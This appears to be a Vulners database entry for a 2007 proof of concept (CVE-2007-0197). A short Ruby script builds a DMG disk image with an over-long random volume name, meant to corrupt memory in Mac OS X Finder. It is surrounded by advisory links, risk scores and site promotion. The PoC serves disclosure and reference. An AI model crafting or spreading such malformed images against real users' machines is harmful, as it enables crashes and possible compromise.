Apple Mac OSX 10.4.8 - Apple Finder DMG Volume Name Memory Corruption (PoC)
| Reporter | Title | Published | Views | Family All 9 |
|---|---|---|---|---|
| Apple Computer Finder DMG Volume Name Memory Corruption (CVE-2007-0197) | 5 Oct 200900:00 | – | checkpoint_advisories | |
| Apple Computer Finder DMG Volume Name Memory Corruption - Ver2 (CVE-2007-0197) | 28 Dec 201400:00 | – | checkpoint_advisories | |
| CVE-2007-0197 | 11 Jan 200711:00 | – | cve | |
| CVE-2007-0197 | 11 Jan 200711:00 | – | cvelist | |
| Mac OS X Multiple Vulnerabilities (Security Update 2007-002) | 16 Feb 200700:00 | – | nessus | |
| CVE-2007-0197 | 11 Jan 200711:28 | – | nvd | |
| Memory corruption | 11 Jan 200711:28 | – | prion | |
| Mac OS X / Apple Finder multiple file system parsing vulnerabilities | 16 Jan 200700:00 | – | securityvulns | |
| Apple Mac OS X Finder DMG volume name buffer overflow | 16 Feb 200700:00 | – | cert |
#!/usr/bin/ruby
# (c) 2006 LMH <lmh [at] infopull.com>.
#
require 'fileutils'
require 'zlib'
hdiutil = "/usr/bin/hdiutil"
dmgname = (ARGV[0] || "MOAB-09-01-2007.dmg")
dmgsize = (ARGV[1] || "200k")
filesys = (ARGV[2] || "UFS")
volname = ""
255.times do
volname << (i = Kernel.rand(62); i += ((i < 10) ? 48 : ((i < 36) ? 55 : 61 ))).chr
end
FileUtils.rm_f(dmgname)
system "#{hdiutil} create #{dmgname} -size #{dmgsize} -fs #{filesys} -volname #{volname}"
puts "++ reading #{dmgname}..."
dmg_stream = File.read(dmgname)
dmg_vnsize = dmg_stream[0x9c10,0x9c14].unpack("C2")
puts "++ volname length at dmg: #{dmg_vnsize}"
puts "++ dmg size: #{dmg_stream.size} bytes."
# milw0rm.com [2007-01-09]Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
20 Sep 2016 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 26.8
EPSS0.0807